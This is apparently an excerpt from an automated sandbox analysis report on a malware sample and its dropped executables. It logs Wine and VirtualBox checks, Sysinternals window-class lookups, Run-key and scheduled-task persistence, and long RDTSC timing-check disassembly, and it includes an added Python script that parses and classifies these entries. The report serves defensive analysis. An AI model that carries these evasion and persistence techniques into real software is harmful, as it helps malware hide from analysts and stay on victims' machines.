Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
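The window-class lookups (FilemonClass, RegmonClass, PROCMON_WINDOW_CLASS), the Run-key writes, the skotes.job file and the Wine / VBOX__ / FirmwareTableInformation checks above all arrive as lines of the same shape, `Source: <process> <observation>: <value>`, repeated per process and per run. The Python below is an added example, not part of this report and not code from the sandbox or from any of the samples: it parses lines in that shape, collapses exact repeats while keeping their count, tags each observation as analysis-tool discovery, persistence or VM detection, and pulls out the Run value names and the job path a responder would want to block. The tag names, the observation-kind list and the sample lines (copied from this section and embedded as constructed input) are the example's own assumptions; the report shows only the Run value names, not their data, so those names are reported as-is.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: behaviour lines copied from this report section, one or
# two per observation type (the real section repeats each many times).
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass",
    r"Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run efe6fe4127.exe Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run efe6fe4127.exe Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine",
    r"Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__",
]

# Observation kinds that occur in this section (assumed list; extend as needed).
KINDS = (
    "Window searched", "File created", "Registry value created or modified",
    "Registry key monitored for changes", "Process information set",
    "System information queried", "File opened",
)
LINE_RE = re.compile(
    r"^Source: (?P<proc>.+?) (?P<kind>" + "|".join(re.escape(k) for k in KINDS)
    + r"): (?P<value>.*?)(?: Jump to behavior)?$"
)
# Window classes of the Sysinternals monitors (Filemon and Regmon are the
# retired predecessors of Process Monitor; malware keeps the old names).
MONITOR_CLASSES = {"filemonclass", "regmonclass", "procmon_window_class"}


def classify(kind, value):
    """Map one observation to a short tag (tag names are this example's own)."""
    v = value.lower()
    if kind == "Window searched":
        name = v.split("window name:", 1)[-1].strip()
        return "analysis-tool-discovery" if name in MONITOR_CLASSES else "window-search"
    if kind == "Registry value created or modified" and "\\currentversion\\run" in v:
        return "persistence:run-key"
    if kind == "File created" and v.startswith("c:\\windows\\tasks\\") and v.endswith(".job"):
        return "persistence:task-job"
    if kind == "File opened" and v.endswith("\\software\\wine"):
        return "vm-detection:wine"
    if kind == "File opened" and "\\acpi\\dsdt\\vbox__" in v:
        return "vm-detection:virtualbox-acpi"
    if kind == "System information queried" and v == "firmwaretableinformation":
        return "vm-detection:firmware-table"
    if kind == "Process information set" and v == "noopenfileerrorbox":
        return "error-dialog-suppression"  # SetErrorMode(SEM_NOOPENFILEERRORBOX)
    return "other:" + kind.lower().replace(" ", "-")


def parse(lines):
    """One record per distinct (process, kind, value); 'hits' counts repeats.
    Lines that do not match the shape are returned separately, not dropped."""
    seen = Counter()
    records, skipped = [], []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            skipped.append(line)
            continue
        key = (m["proc"], m["kind"], m["value"])
        seen[key] += 1
        if seen[key] == 1:
            records.append({"proc": key[0], "kind": key[1], "value": key[2],
                            "tag": classify(key[1], key[2])})
    for r in records:
        r["hits"] = seen[(r["proc"], r["kind"], r["value"])]
    return records, skipped


def summarize(records):
    """Tag counts per process, plus the persistence artefacts worth blocking."""
    per_proc = defaultdict(Counter)
    artefacts = []
    for r in records:
        per_proc[r["proc"]][r["tag"]] += r["hits"]
        if r["tag"] == "persistence:run-key":
            artefacts.append(("run-value", r["value"].rsplit(" ", 1)[-1]))
        elif r["tag"] == "persistence:task-job":
            artefacts.append(("job-file", r["value"]))
    return {p: dict(c) for p, c in per_proc.items()}, artefacts


if __name__ == "__main__":
    recs, bad = parse(SAMPLE_LINES)
    procs, found = summarize(recs)
    for proc, tags in procs.items():
        print(proc, tags)
    print("artefacts:", found, "unparsed:", len(bad))
```

Feeding the whole section through `parse` instead of the sample gives one line per process with its tag counts, which is the quickest way to see that every dropped binary performs the same Sysinternals window lookup and VBOX__/Wine checks while only skotes.exe writes the Run values.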
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E29EB second address: 6E29FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F60A4BE8BD6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E29FB second address: 6E29FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E1EF3 second address: 6E1F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E2057 second address: 6E205D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E205D second address: 6E208C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE2h 0x00000007 jmp 00007F60A4BE8BE5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E208C second address: 6E209B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F60A4E98EF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E209B second address: 6E209F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E209F second address: 6E20A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E20A3 second address: 6E20A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E46E6 second address: 6E478E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F60A4E98EF6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jns 00007F60A4E98EF6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push esi 0x00000019 jo 00007F60A4E98EF6h 0x0000001f pop esi 0x00000020 popad 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F60A4E98EF8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c mov dword ptr [ebp+122D30F5h], edx 0x00000042 push 00000000h 0x00000044 mov ch, F1h 0x00000046 mov ecx, dword ptr [ebp+122D2F0Ah] 0x0000004c call 00007F60A4E98EF9h 0x00000051 js 00007F60A4E98F0Dh 0x00000057 jmp 00007F60A4E98F07h 0x0000005c push eax 0x0000005d jmp 00007F60A4E98F06h 0x00000062 mov eax, dword ptr [esp+04h] 0x00000066 pushad 0x00000067 jmp 00007F60A4E98F03h 0x0000006c push esi 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E478E second address: 6E47A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F60A4BE8BDCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E47A4 second address: 6E4851 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jne 00007F60A4E98F02h 0x00000013 pop eax 0x00000014 call 00007F60A4E98F04h 0x00000019 sub ecx, 2C3C484Fh 0x0000001f pop edx 0x00000020 push 00000003h 0x00000022 mov ch, 66h 0x00000024 mov esi, 44FD3245h 0x00000029 push 00000000h 0x0000002b mov ecx, dword ptr [ebp+122D2C3Ah] 0x00000031 push 00000003h 0x00000033 sub dword ptr [ebp+122D3147h], edx 0x00000039 push 860DF276h 0x0000003e je 00007F60A4E98F02h 0x00000044 jne 00007F60A4E98EFCh 0x0000004a add dword ptr [esp], 39F20D8Ah 0x00000051 pushad 0x00000052 mov dword ptr [ebp+122D2FA0h], ebx 0x00000058 xor edx, dword ptr [ebp+122D2BE6h] 0x0000005e popad 0x0000005f lea ebx, dword ptr [ebp+124495C4h] 0x00000065 mov ecx, 0746D4DCh 0x0000006a mov edi, edx 0x0000006c xchg eax, ebx 0x0000006d push edx 0x0000006e jnl 00007F60A4E98EF8h 0x00000074 pop edx 0x00000075 push eax 0x00000076 push ecx 0x00000077 push eax 0x00000078 push edx 0x00000079 push ecx 0x0000007a pop ecx 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4904 second address: 6E490E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E490E second address: 6E4913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4913 second address: 6E4982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F60A4BE8BD6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 5F537EAFh 0x00000014 call 00007F60A4BE8BDCh 0x00000019 push edi 0x0000001a mov cl, CDh 0x0000001c pop edi 0x0000001d pop esi 0x0000001e mov edx, edi 0x00000020 push 00000003h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F60A4BE8BD8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c cmc 0x0000003d mov dword ptr [ebp+122D1C8Fh], ebx 0x00000043 push 00000000h 0x00000045 mov esi, 23334FEEh 0x0000004a push 00000003h 0x0000004c mov esi, dword ptr [ebp+122D2E2Eh] 0x00000052 call 00007F60A4BE8BD9h 0x00000057 push eax 0x00000058 push edx 0x00000059 jo 00007F60A4BE8BD8h 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4982 second address: 6E49DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F60A4E98EFEh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F60A4E98F04h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push ebx 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a jmp 00007F60A4E98F06h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E49DB second address: 6E49E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4A79 second address: 6E4AA0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F60A4E98EFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60A4E98F04h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4AA0 second address: 6E4AF9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D2FCFh], eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F60A4BE8BD8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b jmp 00007F60A4BE8BE5h 0x00000030 push 940471D2h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jnc 00007F60A4BE8BD6h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4AF9 second address: 6E4B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4B08 second address: 6E4B7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F60A4BE8BE1h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 6BFB8EAEh 0x00000012 jmp 00007F60A4BE8BE5h 0x00000017 push 00000003h 0x00000019 mov dword ptr [ebp+122D37E9h], eax 0x0000001f push 00000000h 0x00000021 mov dword ptr [ebp+122D3BBDh], ecx 0x00000027 push 00000003h 0x00000029 call 00007F60A4BE8BD9h 0x0000002e jnp 00007F60A4BE8BE0h 0x00000034 push eax 0x00000035 push eax 0x00000036 jmp 00007F60A4BE8BDCh 0x0000003b pop eax 0x0000003c mov eax, dword ptr [esp+04h] 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4B7E second address: 6E4B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D4C5E second address: 6D4C76 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60A4BE8BD8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jp 00007F60A4BE8BE2h 0x00000010 jnc 00007F60A4BE8BD6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 703BA4 second address: 703BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 703E91 second address: 703E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 703E99 second address: 703E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 703E9D second address: 703EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D4C5A second address: 6D4C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704016 second address: 70401A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70401A second address: 704020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704020 second address: 704026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704190 second address: 704198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704198 second address: 70419C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7046F9 second address: 704703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F60A4E98EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704703 second address: 704712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704712 second address: 70471C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F60A4E98EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7049B2 second address: 7049B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7049B6 second address: 7049EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F04h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F60A4E98F09h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704CDD second address: 704CE7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F60A4BE8BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704CE7 second address: 704CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704CF1 second address: 704CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704CF5 second address: 704D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jp 00007F60A4E98EF6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FC986 second address: 6FC98B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D82EC second address: 6D82FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98EFAh 0x00000009 pop edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D82FE second address: 6D830C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F60A4BE8BD6h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D830C second address: 6D8312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D8312 second address: 6D8338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F60A4BE8BDEh 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jnp 00007F60A4BE8BD6h 0x00000016 pop eax 0x00000017 push esi 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704E22 second address: 704E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704E28 second address: 704E38 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 je 00007F60A4BE8BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7053E0 second address: 7053E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7053E6 second address: 7053EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A6FE second address: 70A704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70D29C second address: 70D2A6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70D8A7 second address: 70D8B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F60A4E98EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70D8B1 second address: 70D8B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70D9C5 second address: 70D9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70D9D7 second address: 70D9F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jc 00007F60A4BE8BF3h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70D9F2 second address: 70D9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71026C second address: 710270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 710270 second address: 710280 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60A4E98EF6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
